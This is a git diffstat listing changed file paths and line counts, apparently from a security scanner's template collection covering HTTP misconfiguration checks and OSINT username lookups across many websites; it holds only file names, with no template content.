http/miscellaneous/crypto-mining-malware.yaml | 1 + .../miscellaneous/defaced-website-detect.yaml | 2 +- http/miscellaneous/detect-dns-over-https.yaml | 3 +- http/miscellaneous/dir-listing.yaml | 2 +- http/miscellaneous/email-extractor.yaml | 2 +- .../exposed-file-upload-form.yaml | 2 +- .../external-service-interaction.yaml | 1 - .../firebase-database-extractor.yaml | 2 +- http/miscellaneous/google-floc-disabled.yaml | 2 +- http/miscellaneous/gpc-json.yaml | 3 +- http/miscellaneous/htaccess-config.yaml | 2 +- http/miscellaneous/http-trace.yaml | 2 +- http/miscellaneous/joomla-htaccess.yaml | 2 +- http/miscellaneous/joomla-manifest-file.yaml | 2 +- http/miscellaneous/moodle-changelog.yaml | 2 +- .../netflix-conductor-version.yaml | 3 +- http/miscellaneous/old-copyright.yaml | 3 +- http/miscellaneous/options-method.yaml | 2 +- http/miscellaneous/rdap-whois.yaml | 5 +- http/miscellaneous/robots-txt-endpoint.yaml | 4 +- http/miscellaneous/robots-txt.yaml | 3 +- http/miscellaneous/security-txt.yaml | 1 + http/miscellaneous/sitemap-detect.yaml | 3 +- http/miscellaneous/spnego-detect.yaml | 3 +- http/miscellaneous/x-recruiting-header.yaml | 4 +- http/miscellaneous/xml-schema-detect.yaml | 2 +- .../misconfiguration/ace-admin-dashboard.yaml | 2 +- .../adobe-connect-username-exposure.yaml | 2 +- .../adobe/adobe-connect-version.yaml | 2 +- http/misconfiguration/aem/aem-bg-servlet.yaml | 2 +- .../aem/aem-cached-pages.yaml | 1 + .../aem/aem-childrenlist-xss.yaml | 3 +- http/misconfiguration/aem/aem-crx-bypass.yaml | 3 +- http/misconfiguration/aem/aem-crx-search.yaml | 1 + .../aem/aem-custom-script.yaml | 3 +- .../aem/aem-debugging-libraries.yaml | 2 +- .../aem/aem-default-get-servlet.yaml | 1 + http/misconfiguration/aem/aem-disk-usage.yaml | 1 + .../aem/aem-dump-contentnode.yaml | 3 +- .../aem/aem-external-link-checker.yaml | 1 + .../misconfiguration/aem/aem-gql-servlet.yaml | 1 + .../aem/aem-groovyconsole.yaml | 3 +- .../aem/aem-hash-querybuilder.yaml | 2 +- .../aem/aem-jcr-querybuilder.yaml | 2 +- .../aem/aem-login-status.yaml | 1 + .../aem/aem-merge-metadata-servlet.yaml | 1 + http/misconfiguration/aem/aem-misc-admin.yaml | 3 +- .../aem/aem-querybuilder-feed-servlet.yaml | 3 +- .../aem-querybuilder-internal-path-read.yaml | 3 +- .../aem/aem-querybuilder-json-servlet.yaml | 1 + http/misconfiguration/aem/aem-secrets.yaml | 8 +- .../aem/aem-setpreferences-xss.yaml | 1 + .../aem/aem-sling-userinfo.yaml | 1 + .../aem/aem-userinfo-servlet.yaml | 1 + .../aem/aem-wcm-suggestions-servlet.yaml | 2 +- .../aem/aem-xss-childlist-selector.yaml | 8 +- .../airflow/unauthenticated-airflow.yaml | 1 + .../akamai/akamai-arl-xss.yaml | 2 +- .../akamai/akamai-s3-cache-poisoning.yaml | 9 +- .../alibaba-mongoshake-unauth.yaml | 4 +- .../ampache-update-exposure.yaml | 2 +- http/misconfiguration/ampps-dirlisting.yaml | 5 +- .../apache-drill-exposure.yaml | 2 +- .../misconfiguration/apache-druid-unauth.yaml | 3 +- http/misconfiguration/apache-impala.yaml | 5 +- .../apache-struts-showcase.yaml | 3 +- .../apache/apache-couchdb-unauth.yaml | 2 +- .../apache/apache-filename-enum.yaml | 4 +- .../apache/apache-hbase-unauth.yaml | 3 +- .../apache/apache-nifi-unauth.yaml | 4 +- .../apache/apache-storm-unauth.yaml | 3 +- .../apache/apache-zeppelin-unauth.yaml | 4 +- .../apache/tomcat-pathnormalization.yaml | 6 +- http/misconfiguration/apc-info.yaml | 2 +- .../apollo-adminservice-unauth.yaml | 2 +- http/misconfiguration/application-yaml.yaml | 5 +- .../artifactory-anonymous-deploy.yaml | 4 +- http/misconfiguration/aspx-debug-mode.yaml | 4 +- .../atlassian-bamboo-build.yaml | 2 +- http/misconfiguration/aws-ec2-status.yaml | 4 +- http/misconfiguration/aws-object-listing.yaml | 3 +- http/misconfiguration/aws-redirect.yaml | 4 +- http/misconfiguration/aws-s3-explorer.yaml | 2 +- .../aws-xray-application.yaml | 2 +- http/misconfiguration/awstats-listing.yaml | 3 +- .../bitbucket-auth-bypass.yaml | 4 +- .../bitbucket-public-repository.yaml | 3 +- .../blackbox-exporter-metrics.yaml | 2 +- .../bootstrap-admin-panel-template.yaml | 4 +- http/misconfiguration/bravia-signage.yaml | 2 +- .../browserless-debugger.yaml | 2 +- http/misconfiguration/cadvisor-exposure.yaml | 2 +- .../casdoor-users-password.yaml | 2 +- http/misconfiguration/cgi-test-page.yaml | 2 +- http/misconfiguration/chatgpt-web-unauth.yaml | 2 +- .../clickhouse-unauth-api.yaml | 2 +- .../clockwork-dashboard-exposure.yaml | 2 +- http/misconfiguration/cloud-metadata.yaml | 2 +- .../cloudflare-image-ssrf.yaml | 2 +- http/misconfiguration/cluster-panel.yaml | 6 +- .../cobbler-exposed-directory.yaml | 2 +- .../codeigniter-errorpage.yaml | 2 +- http/misconfiguration/codemeter-webadmin.yaml | 2 +- http/misconfiguration/codis-dashboard.yaml | 2 +- .../collectd-exporter-metrics.yaml | 2 +- .../command-api-explorer.yaml | 4 +- .../confluence-dashboard.yaml | 3 +- .../confluence/confluence-oauth-admin.yaml | 3 +- http/misconfiguration/corebos-htaccess.yaml | 2 +- .../cx-cloud-upload-detect.yaml | 7 +- .../d-link-arbitary-fileread.yaml | 4 +- .../misconfiguration/debug/ampache-debug.yaml | 3 +- http/misconfiguration/debug/bottle-debug.yaml | 2 +- .../debug/flask-werkzeug-debug.yaml | 2 +- http/misconfiguration/debug/github-debug.yaml | 2 +- http/misconfiguration/default-spx-key.yaml | 8 +- .../misconfiguration/deos-openview-admin.yaml | 2 +- .../dgraph-dashboard-exposure.yaml | 2 +- .../misconfiguration/django-debug-detect.yaml | 4 +- http/misconfiguration/docker-registry.yaml | 3 +- .../docmosis-tornado-server.yaml | 2 +- http/misconfiguration/druid-monitor.yaml | 2 +- .../drupal/drupal-user-enum-ajax.yaml | 1 + .../drupal/drupal-user-enum-redirect.yaml | 3 +- .../dynamic-container-host.yaml | 2 +- .../ec2-instance-information.yaml | 2 +- http/misconfiguration/ecology-info-leak.yaml | 4 +- .../elastic-hd-dashboard.yaml | 2 +- http/misconfiguration/elasticsearch.yaml | 3 +- .../encompass-cm1-homepage.yaml | 4 +- .../envoy-admin-exposure.yaml | 2 +- .../espeasy-mega-exposure.yaml | 2 +- http/misconfiguration/esphome-dashboard.yaml | 2 +- .../etcd-unauthenticated-api.yaml | 2 +- http/misconfiguration/everything-listing.yaml | 2 +- http/misconfiguration/exposed-docker-api.yaml | 4 +- .../exposed-jquery-file-upload.yaml | 3 +- http/misconfiguration/exposed-kafdrop.yaml | 2 +- http/misconfiguration/exposed-kibana.yaml | 1 + .../misconfiguration/exposed-service-now.yaml | 2 +- .../exposed-sqlite-manager.yaml | 3 +- .../misconfiguration/express-stack-trace.yaml | 4 +- .../misconfiguration/feiyuxing-info-leak.yaml | 2 +- http/misconfiguration/filebrowser-unauth.yaml | 3 +- http/misconfiguration/flask-redis-docker.yaml | 5 +- http/misconfiguration/formalms-install.yaml | 2 +- .../front-page-misconfig.yaml | 2 +- .../ganglia-cluster-dashboard.yaml | 3 +- .../genieacs-default-jwt.yaml | 5 +- http/misconfiguration/git-web-interface.yaml | 2 +- .../misconfiguration/gitea-public-signup.yaml | 2 +- .../gitlab/gitlab-api-user-enum.yaml | 2 +- .../gitlab/gitlab-public-repos.yaml | 1 + .../gitlab/gitlab-public-signup.yaml | 2 +- .../gitlab/gitlab-uninitialized-password.yaml | 3 +- .../gitlab/gitlab-user-enum.yaml | 5 +- http/misconfiguration/gitlist-disclosure.yaml | 2 +- .../global-traffic-statistics.yaml | 2 +- .../glpi-directory-listing.yaml | 2 +- .../gocd/gocd-encryption-key.yaml | 1 - .../google/insecure-firebase-database.yaml | 6 +- http/misconfiguration/gopher-server.yaml | 4 +- .../graphql/graphql-alias-batching.yaml | 11 +- .../graphql/graphql-array-batching.yaml | 8 +- .../graphql/graphql-field-suggestion.yaml | 4 +- .../graphql/graphql-get-method.yaml | 3 +- .../graphql/graphql-playground.yaml | 2 +- .../misconfiguration/grav-register-admin.yaml | 2 +- http/misconfiguration/hadoop-unauth-rce.yaml | 2 +- .../haproxy-exporter-metrics.yaml | 2 +- http/misconfiguration/haproxy-status.yaml | 2 +- .../healthchecks-ui-exposure.yaml | 3 +- http/misconfiguration/hfs-exposure.yaml | 2 +- http/misconfiguration/hikivision-env.yaml | 3 +- http/misconfiguration/hivequeue-agent.yaml | 2 +- .../hp/unauthorized-hp-printer.yaml | 2 +- .../hpe-system-management-anonymous.yaml | 4 +- .../http-missing-security-headers.yaml | 3 +- .../httponly-cookie-detect.yaml | 4 +- .../ibm-friendly-path-exposure.yaml | 1 + http/misconfiguration/ibm-websphere-xml.yaml | 2 +- .../installer/acunetix-360-installer.yaml | 2 +- .../installer/akeeba-installer.yaml | 2 +- .../installer/alma-installer.yaml | 2 +- .../installer/ampache-music-installer.yaml | 2 +- .../atlassian-bamboo-setup-wizard.yaml | 2 +- .../installer/avideo-install.yaml | 2 +- .../installer/bagisto-installer.yaml | 3 +- .../installer/binom-installer.yaml | 3 +- .../installer/bitrix24-installer.yaml | 2 +- .../installer/blesta-installer.yaml | 2 +- .../installer/circarlife-setup.yaml | 5 +- .../installer/clipbucket-installer.yaml | 4 +- .../installer/cloudcenter-Installer.yaml | 2 +- .../installer/codeigniter-installer.yaml | 2 +- .../installer/combodo-itop-installer.yaml | 3 +- .../installer/concrete-installer.yaml | 2 +- .../installer/contentify-installer.yaml | 2 +- .../installer/discourse-installer.yaml | 2 +- .../installer/dokuwiki-installer.yaml | 2 +- .../installer/dolibarr-installer.yaml | 2 +- .../installer/dolphin-installer.yaml | 2 +- .../installer/easyscripts-installer.yaml | 2 +- .../installer/eshop-installer.yaml | 2 +- .../installer/espeasy-installer.yaml | 3 +- .../installer/facturascripts-installer.yaml | 2 +- .../installer/geniusocean-installer.yaml | 2 +- .../installer/getsimple-installation.yaml | 6 +- .../installer/gibbon-installer.yaml | 2 +- .../installer/gitea-installer.yaml | 2 +- .../installer/gogs-installer.yaml | 2 +- .../installer/impresspages-installer.yaml | 4 +- .../installer/indegy-sensor-installer.yaml | 2 +- .../installer/jira-setup.yaml | 3 +- .../installer/joomla-installer.yaml | 2 +- .../installer/klr300n-installer.yaml | 3 +- .../installer/limesurvey-installer.yaml | 2 +- .../installer/lmszai-installer.yaml | 2 +- .../installer/lychee-installer.yaml | 2 +- .../installer/magento-installer.yaml | 2 +- .../installer/magnolia-installer.yaml | 2 +- .../installer/mantisbt-installer.yaml | 2 +- .../installer/matomo-installer.yaml | 2 +- .../installer/mautic-installer.yaml | 2 +- .../installer/mcloud-installer.yaml | 6 +- .../metaview-explorer-installer.yaml | 2 +- .../installer/monstra-installer.yaml | 2 +- .../installer/moodle-installer.yaml | 2 +- .../installer/nagiosxi-installer.yaml | 2 +- .../netsparker-enterprise-installer.yaml | 2 +- .../installer/nginx-auto-installer.yaml | 2 +- .../installer/nodebb-installer.yaml | 2 +- .../installer/nopcommerce-installer.yaml | 8 +- .../installer/ojs-installer.yaml | 3 +- .../installer/openmage-install.yaml | 2 +- .../installer/openshift-installer-panel.yaml | 2 +- .../installer/opensis-installer.yaml | 2 +- .../installer/orangehrm-installer.yaml | 4 +- .../owncloud-installer-exposure.yaml | 3 +- .../installer/oxid-eshop-installer.yaml | 2 +- .../installer/pagekit-installer.yaml | 2 +- .../installer/permissions-installer.yaml | 2 +- .../installer/phpbb-installer.yaml | 2 +- .../installer/phpwind-installer.yaml | 2 +- .../installer/piwik-installer.yaml | 2 +- .../installer/pmm-installer.yaml | 2 +- .../installer/prestashop-installer.yaml | 2 +- .../installer/processwire-installer.yaml | 3 +- .../installer/redash-installer.yaml | 2 +- .../installer/server-monitor-installer.yaml | 2 +- .../installer/shopify-app-installer.yaml | 3 +- .../installer/shopware-installer.yaml | 2 +- .../installer/smf-installer.yaml | 2 +- .../installer/sms-installer.yaml | 2 +- .../installer/spip-install.yaml | 3 +- .../installer/suitecrm-installer.yaml | 2 +- .../installer/sumowebtools-installer.yaml | 2 +- .../installer/tasmota-install.yaml | 2 +- .../installer/testrail-install.yaml | 2 +- .../installer/tiny-rss-installer.yaml | 2 +- .../installer/turbo-website-installer.yaml | 2 +- .../installer/typo3-installer.yaml | 2 +- .../installer/umbraco-installer.yaml | 2 +- .../installer/unifi-wizard-install.yaml | 2 +- .../installer/uvdesk-install.yaml | 2 +- .../installer/vironeer-installer.yaml | 2 +- .../installer/vtiger-installer.yaml | 2 +- .../installer/webasyst-installer.yaml | 2 +- .../installer/webuzo-installer.yaml | 2 +- .../installer/wp-install.yaml | 8 +- .../installer/yzmcms-installer.yaml | 2 +- .../installer/zabbix-installer.yaml | 2 +- .../installer/zencart-installer.yaml | 4 +- .../installer/zenphoto-setup.yaml | 2 +- .../internal-ip-disclosure.yaml | 3 +- http/misconfiguration/iot-vdme-simulator.yaml | 3 +- .../misconfiguration/java-melody-exposed.yaml | 6 +- http/misconfiguration/jboss-status.yaml | 4 +- http/misconfiguration/jboss-web-service.yaml | 2 +- .../jenkins/jenkins-openuser-register.yaml | 2 +- .../jetty-showcontexts-enable.yaml | 2 +- .../jolokia/jolokia-info-disclosure.yaml | 2 +- .../jolokia/jolokia-list.yaml | 3 +- .../jolokia/jolokia-mbean-search.yaml | 3 +- .../jolokia/jolokia-unauthenticated-lfi.yaml | 4 +- .../jupyter-ipython-unauth.yaml | 5 +- http/misconfiguration/jupyter-lab-unauth.yaml | 2 +- .../jupyter-notebooks-exposed.yaml | 1 + .../kubeflow-dashboard-unauth.yaml | 3 +- .../kubernetes/kube-state-metrics.yaml | 2 +- .../kubernetes/kubernetes-metrics.yaml | 2 +- .../kubernetes/kubernetes-pods.yaml | 2 +- .../kubernetes-resource-report.yaml | 2 +- .../kubernetes/unauth-etcd-server.yaml | 4 +- .../laravel-debug-enabled.yaml | 2 +- .../misconfiguration/laravel-debug-error.yaml | 4 +- .../laravel-debug-infoleak.yaml | 2 +- .../laravel-horizon-unauth.yaml | 4 +- .../libvirt-exporter-metrics.yaml | 2 +- .../misconfiguration/liferay/liferay-api.yaml | 8 +- .../liferay/liferay-axis.yaml | 2 +- .../liferay/liferay-jsonws.yaml | 2 +- .../misconfiguration/linkerd-ssrf-detect.yaml | 6 +- .../linktap-gateway-exposure.yaml | 2 +- http/misconfiguration/locust-exposure.yaml | 2 +- .../lvm-exporter-metrics.yaml | 2 +- .../manage-engine-ad-search.yaml | 3 +- .../mingyu-xmlrpc-sock-adduser.yaml | 3 +- .../misconfigured-concrete5.yaml | 4 +- .../misconfigured-docker.yaml | 2 +- http/misconfiguration/missing-sri.yaml | 4 +- http/misconfiguration/mlflow-unauth.yaml | 2 +- .../misconfiguration/mobiproxy-dashboard.yaml | 2 +- .../mobsf-framework-exposure.yaml | 2 +- .../moleculer-microservices.yaml | 2 +- .../mongodb-exporter-metrics.yaml | 12 +- .../multilaser-pro-setup.yaml | 2 +- .../mysqld-exporter-metrics.yaml | 4 +- .../nacos-authentication-bypass.yaml | 7 +- .../nacos/nacos-create-user.yaml | 4 +- .../namedprocess-exporter-metrics.yaml | 2 +- http/misconfiguration/nextcloud-install.yaml | 5 +- http/misconfiguration/nginx/nginx-status.yaml | 2 +- .../nginx/nginx-vhost-traffic-status.yaml | 3 +- http/misconfiguration/ngrok-status-page.yaml | 6 +- .../node-exporter-metrics.yaml | 2 +- http/misconfiguration/nomad-jobs.yaml | 2 +- http/misconfiguration/ntop-panel-exposed.yaml | 2 +- .../ntopng-traffic-dashboard.yaml | 2 +- .../odoo-unprotected-database.yaml | 4 +- .../office365-open-redirect.yaml | 2 +- .../oneinstack-control-center.yaml | 2 +- http/misconfiguration/openstack-config.yaml | 1 + .../oracle-reports-services.yaml | 3 +- http/misconfiguration/pa11y-dashboard.yaml | 2 +- http/misconfiguration/pcdn-cache-node.yaml | 2 +- http/misconfiguration/perfsonar-toolkit.yaml | 5 +- .../pghero-dashboard-exposure.yaml | 6 +- .../php-debugbar-exposure.yaml | 4 +- http/misconfiguration/php-fpm-status.yaml | 3 +- http/misconfiguration/php-src-disclosure.yaml | 2 +- http/misconfiguration/phpcli-stack-trace.yaml | 4 +- .../phpmemcached-admin-panel.yaml | 2 +- .../phpmyadmin-misconfiguration.yaml | 3 +- .../phpmyadmin/phpmyadmin-server-import.yaml | 3 +- .../phpmyadmin/phpmyadmin-setup.yaml | 3 +- http/misconfiguration/phpnow-works.yaml | 4 +- http/misconfiguration/pinpoint-unauth.yaml | 2 +- .../postgres-exporter-metrics.yaml | 2 +- .../private-key-exposure.yaml | 4 +- .../misconfiguration/prometheus-promtail.yaml | 2 +- .../prometheus/prometheus-config.yaml | 5 +- .../prometheus/prometheus-exporter.yaml | 4 +- .../prometheus/prometheus-flags.yaml | 2 +- .../prometheus/prometheus-log.yaml | 2 +- .../prometheus/prometheus-targets.yaml | 6 +- .../proxy/metadata-alibaba.yaml | 5 +- http/misconfiguration/proxy/metadata-aws.yaml | 5 +- .../proxy/metadata-azure.yaml | 5 +- .../proxy/metadata-digitalocean.yaml | 5 +- .../proxy/metadata-google.yaml | 5 +- .../proxy/metadata-hetzner.yaml | 5 +- .../proxy/metadata-openstack.yaml | 6 +- .../proxy/metadata-oracle.yaml | 5 +- .../proxy/open-proxy-external.yaml | 3 +- .../proxy/open-proxy-internal.yaml | 8 +- .../proxy/open-proxy-localhost.yaml | 4 +- .../proxy/open-proxy-portscan.yaml | 4 +- http/misconfiguration/puppetdb-dashboard.yaml | 4 +- http/misconfiguration/put-method-enabled.yaml | 7 +- http/misconfiguration/questdb-console.yaml | 7 +- .../qvidium-management-system-exposed.yaml | 3 +- .../rabbitmq-exporter-metrics.yaml | 2 +- http/misconfiguration/rack-mini-profiler.yaml | 2 +- http/misconfiguration/ray-dashboard.yaml | 2 +- .../rekognition-image-validation.yaml | 4 +- .../request-baskets-exposure.yaml | 2 +- .../rethinkdb-admin-console.yaml | 2 +- .../roxyfileman-fileupload.yaml | 6 +- http/misconfiguration/s3-torrent.yaml | 4 +- http/misconfiguration/salesforce-aura.yaml | 5 +- .../sap/sap-directory-listing.yaml | 4 +- .../sap/sap-netweaver-info-leak.yaml | 2 +- http/misconfiguration/seeyon-unauth.yaml | 3 +- http/misconfiguration/selenium-exposure.yaml | 3 +- .../server-status-localhost.yaml | 4 +- http/misconfiguration/server-status.yaml | 4 +- http/misconfiguration/service-pwd.yaml | 2 +- .../setup-github-enterprise.yaml | 2 +- http/misconfiguration/shell-history.yaml | 2 +- http/misconfiguration/sitecore-lfi.yaml | 2 +- http/misconfiguration/skycaiji-install.yaml | 2 +- .../misconfiguration/slurm-hpc-dashboard.yaml | 2 +- http/misconfiguration/smarterstats-setup.yaml | 3 +- http/misconfiguration/smokeping-grapher.yaml | 4 +- .../solr-query-dashboard.yaml | 2 +- .../sonarqube-projects-disclosure.yaml | 2 +- .../sonarqube-public-projects.yaml | 5 +- .../sony-bravia-disclosure.yaml | 2 +- .../sound4-directory-listing.yaml | 2 +- .../spidercontrol-scada-server-info.yaml | 5 +- .../springboot/spring-eureka.yaml | 2 +- .../springboot/springboot-auditevents.yaml | 5 +- .../springboot/springboot-autoconfig.yaml | 3 +- .../springboot/springboot-beans.yaml | 3 +- .../springboot/springboot-caches.yaml | 3 +- .../springboot/springboot-conditions.yaml | 3 +- .../springboot/springboot-configprops.yaml | 5 +- .../springboot/springboot-dump.yaml | 3 +- .../springboot/springboot-env.yaml | 3 +- .../springboot/springboot-features.yaml | 3 +- .../springboot/springboot-flyway.yaml | 3 +- .../springboot/springboot-gateway.yaml | 3 +- .../springboot/springboot-health.yaml | 5 +- .../springboot/springboot-heapdump.yaml | 4 +- .../springboot/springboot-httptrace.yaml | 3 +- .../springboot/springboot-info.yaml | 5 +- .../springboot/springboot-jolokia.yaml | 3 +- .../springboot/springboot-liquidbase.yaml | 3 +- .../springboot/springboot-logfile.yaml | 3 +- .../springboot/springboot-loggerconfig.yaml | 5 +- .../springboot/springboot-loggers.yaml | 3 +- .../springboot/springboot-mappings.yaml | 3 +- .../springboot/springboot-metrics.yaml | 3 +- .../springboot/springboot-scheduledtasks.yaml | 5 +- .../springboot/springboot-status.yaml | 5 +- .../springboot/springboot-threaddump.yaml | 3 +- .../springboot/springboot-trace.yaml | 2 +- .../sql-server-report-viewer.yaml | 3 +- .../ssrf-via-oauth-misconfig.yaml | 6 +- .../misconfiguration/struts-ognl-console.yaml | 2 +- http/misconfiguration/symfony-debug.yaml | 2 +- .../symfony-fosjrouting-bundle.yaml | 2 +- http/misconfiguration/symfony-fragment.yaml | 2 +- .../misconfiguration/syncthing-dashboard.yaml | 3 +- .../system-properties-exposure.yaml | 2 +- .../tasmota-config-webui.yaml | 2 +- http/misconfiguration/tcpconfig.yaml | 8 +- .../teamcity-guest-login-enabled.yaml | 4 +- .../teamcity-registration-enabled.yaml | 6 +- .../teslamate-unauth-access.yaml | 2 +- http/misconfiguration/thinkphp-errors.yaml | 2 +- http/misconfiguration/tls-sni-proxy.yaml | 4 +- .../tomcat-cookie-exposed.yaml | 2 +- http/misconfiguration/tomcat-scripts.yaml | 4 +- .../transmission-dashboard.yaml | 3 +- http/misconfiguration/typo3-composer.yaml | 4 +- http/misconfiguration/typo3-debug-mode.yaml | 2 +- .../unauth-apache-kafka-ui.yaml | 3 +- .../unauth-axyom-network-manager.yaml | 2 +- http/misconfiguration/unauth-etherpad.yaml | 2 +- .../unauth-fastvue-dashboard.yaml | 2 +- http/misconfiguration/unauth-kubecost.yaml | 3 +- .../unauth-ldap-account-manager.yaml | 2 +- .../unauth-mautic-upgrade.yaml | 2 +- http/misconfiguration/unauth-mercurial.yaml | 2 +- .../unauth-redis-insight.yaml | 2 +- .../unauth-selenium-grid-console.yaml | 5 +- .../unauth-temporal-web-ui.yaml | 5 +- .../misconfiguration/unauth-wavink-panel.yaml | 2 +- http/misconfiguration/unauth-zwave-mqtt.yaml | 2 +- .../unauthenticated-glances.yaml | 2 +- .../unauthenticated-lansweeper.yaml | 4 +- .../unauthenticated-mongo-express.yaml | 3 +- .../unauthenticated-netdata.yaml | 4 +- .../unauthenticated-nginx-dashboard.yaml | 1 + .../unauthenticated-popup-upload.yaml | 6 +- .../unauthenticated-prtg.yaml | 2 +- .../unauthenticated-tensorboard.yaml | 4 +- .../unauthenticated-varnish-cache-purge.yaml | 2 +- .../unauthenticated-zipkin.yaml | 2 +- .../unauthorized-h3csecparh-login.yaml | 2 +- .../unauthorized-plastic-scm.yaml | 7 +- http/misconfiguration/ups-status.yaml | 4 +- http/misconfiguration/v2x-control.yaml | 4 +- .../vercel-source-exposure.yaml | 8 +- .../misconfiguration/vernemq-status-page.yaml | 2 +- .../wamp-server-configuration.yaml | 2 +- http/misconfiguration/wamp-xdebug-detect.yaml | 4 +- .../webalizer-statistics.yaml | 3 +- http/misconfiguration/webdav-enabled.yaml | 6 +- .../wildcard-postmessage.yaml | 2 +- .../wp-registration-enabled.yaml | 5 +- .../xss-deprecated-header.yaml | 5 +- .../zabbix-dashboards-access.yaml | 2 +- http/misconfiguration/zabbix-error.yaml | 2 +- .../zenphoto-sensitive-info.yaml | 3 +- .../zhiyuan-oa-unauthorized.yaml | 3 +- http/osint/1001mem.yaml | 7 +- http/osint/21buttons.yaml | 7 +- http/osint/247sports.yaml | 7 +- http/osint/3dnews.yaml | 7 +- http/osint/3dtoday.yaml | 7 +- http/osint/7cup.yaml | 7 +- http/osint/7dach.yaml | 7 +- http/osint/aaha-chat.yaml | 7 +- http/osint/aboutme.yaml | 7 +- http/osint/acf.yaml | 7 +- http/osint/admire-me.yaml | 7 +- http/osint/adult-forum.yaml | 7 +- http/osint/adultism.yaml | 7 +- http/osint/advfn.yaml | 7 +- http/osint/aflam.yaml | 7 +- http/osint/airline-pilot-life.yaml | 7 +- http/osint/airliners.yaml | 7 +- http/osint/akniga.yaml | 7 +- http/osint/albicla.yaml | 7 +- http/osint/alik.yaml | 7 +- http/osint/allesovercrypto.yaml | 7 +- http/osint/allmylinks.yaml | 7 +- http/osint/alloannonces.yaml | 7 +- http/osint/alltrails.yaml | 7 +- http/osint/ameblo.yaml | 7 +- http/osint/americanthinker.yaml | 7 +- http/osint/animeplanet.yaml | 7 +- http/osint/anobii.yaml | 7 +- http/osint/anonup.yaml | 7 +- http/osint/apex-legends.yaml | 7 +- http/osint/appian.yaml | 7 +- http/osint/apteka.yaml | 7 +- http/osint/archive-of-our-own-account.yaml | 7 +- http/osint/arduino.yaml | 7 +- http/osint/armorgames.yaml | 7 +- http/osint/artbreeder.yaml | 7 +- http/osint/artists-clients.yaml | 7 +- http/osint/artstation.yaml | 7 +- http/osint/asciinema.yaml | 7 +- http/osint/askfm.yaml | 7 +- http/osint/audiojungle.yaml | 7 +- http/osint/auru.yaml | 7 +- http/osint/authorstream.yaml | 7 +- http/osint/avid-community.yaml | 7 +- http/osint/babepedia.yaml | 7 +- http/osint/babypips.yaml | 7 +- http/osint/bandcamp.yaml | 7 +- http/osint/bandlab.yaml | 7 +- http/osint/bblog-ru.yaml | 7 +- http/osint/bdsmlr.yaml | 7 +- http/osint/bdsmsingles.yaml | 7 +- http/osint/behance.yaml | 7 +- http/osint/bentbox.yaml | 7 +- http/osint/biggerpockets.yaml | 7 +- http/osint/bigo-live.yaml | 7 +- http/osint/bikemap.yaml | 7 +- http/osint/bimpos.yaml | 7 +- http/osint/biolink.yaml | 7 +- http/osint/bitbucket.yaml | 7 +- http/osint/bitchute.yaml | 7 +- http/osint/bitcoin-forum.yaml | 7 +- http/osint/bittube.yaml | 7 +- http/osint/blipfm.yaml | 7 +- http/osint/blogger.yaml | 7 +- http/osint/blogipl.yaml | 7 +- http/osint/blogmarks.yaml | 7 +- http/osint/blogspot.yaml | 7 +- http/osint/bodybuildingcom.yaml | 7 +- http/osint/bonga-cams.yaml | 7 +- http/osint/bookcrossing.yaml | 7 +- http/osint/boosty.yaml | 7 +- http/osint/booth.yaml | 7 +- http/osint/breach-forums.yaml | 7 +- http/osint/brickset.yaml | 7 +- http/osint/bugcrowd.yaml | 7 +- http/osint/bunpro.yaml | 7 +- http/osint/buymeacoffee.yaml | 7 +- http/osint/buzzfeed.yaml | 7 +- http/osint/buzznet.yaml | 7 +- http/osint/cafecito.yaml | 7 +- http/osint/cal.yaml | 5 +- http/osint/cameo.yaml | 7 +- http/osint/carbonmade.yaml | 7 +- http/osint/careerhabr.yaml | 7 +- http/osint/caringbridge.yaml | 7 +- http/osint/carrdco.yaml | 7 +- http/osint/cashapp.yaml | 7 +- http/osint/castingcallclub.yaml | 7 +- http/osint/cd-action.yaml | 7 +- http/osint/cdapl.yaml | 7 +- http/osint/championat.yaml | 7 +- http/osint/chamsko.yaml | 7 +- http/osint/chaturbate.yaml | 7 +- http/osint/cheezburger.yaml | 7 +- http/osint/chesscom.yaml | 7 +- http/osint/chomikujpl.yaml | 7 +- http/osint/chyoa.yaml | 7 +- ...climatejusticerocks-mastodon-instance.yaml | 7 +- http/osint/cloudflare.yaml | 7 +- http/osint/clubhouse.yaml | 7 +- http/osint/clusterdafrica.yaml | 7 +- http/osint/cnet.yaml | 7 +- http/osint/codeberg.yaml | 7 +- http/osint/codecademy.yaml | 7 +- http/osint/codeforces.yaml | 7 +- http/osint/codementor.yaml | 7 +- http/osint/coderwall.yaml | 7 +- http/osint/codewars.yaml | 7 +- http/osint/cohost.yaml | 7 +- http/osint/colourlovers.yaml | 7 +- http/osint/contactossex.yaml | 7 +- http/osint/coroflot.yaml | 7 +- http/osint/couchsurfing.yaml | 8 +- http/osint/cowboys4angels.yaml | 7 +- http/osint/cracked-io.yaml | 7 +- http/osint/cracked.yaml | 7 +- http/osint/crevado.yaml | 7 +- http/osint/crowdin.yaml | 7 +- http/osint/ctflearn.yaml | 5 +- http/osint/cults3d.yaml | 7 +- http/osint/curiouscat.yaml | 7 +- http/osint/cytoid.yaml | 7 +- http/osint/dailymotion.yaml | 7 +- http/osint/darudar.yaml | 7 +- http/osint/dateinasia.yaml | 7 +- http/osint/datezone.yaml | 7 +- http/osint/datingru.yaml | 7 +- http/osint/demotywatory.yaml | 7 +- http/osint/depop.yaml | 7 +- http/osint/designspriation.yaml | 7 +- http/osint/destructoid.yaml | 7 +- http/osint/deviantart.yaml | 7 +- http/osint/devrant.yaml | 7 +- http/osint/devto.yaml | 7 +- http/osint/dfgames.yaml | 7 +- http/osint/diablo.yaml | 7 +- http/osint/dibiz.yaml | 7 +- http/osint/digitalspy.yaml | 7 +- http/osint/diigo.yaml | 7 +- .../disabledrocks-mastodon-instance.yaml | 7 +- http/osint/discogs.yaml | 7 +- http/osint/discourse.yaml | 7 +- http/osint/discusselasticco.yaml | 7 +- .../discusssocial-mastodon-instance.yaml | 7 +- http/osint/disqus.yaml | 7 +- http/osint/dissenter.yaml | 7 +- http/osint/dockerhub.yaml | 7 +- http/osint/dojoverse.yaml | 7 +- http/osint/donation-alerts.yaml | 7 +- http/osint/dotcards.yaml | 7 +- http/osint/dribbble.yaml | 7 +- http/osint/droners.yaml | 7 +- http/osint/drum.yaml | 7 +- http/osint/duolingo.yaml | 7 +- http/osint/easyen.yaml | 7 +- http/osint/ebay-stores.yaml | 7 +- http/osint/ebay.yaml | 7 +- http/osint/elloco.yaml | 7 +- http/osint/engadget.yaml | 7 +- http/osint/eporner.yaml | 7 +- http/osint/etoro.yaml | 7 +- http/osint/etsy.yaml | 7 +- .../expressionalsocial-mastodon-instance.yaml | 7 +- 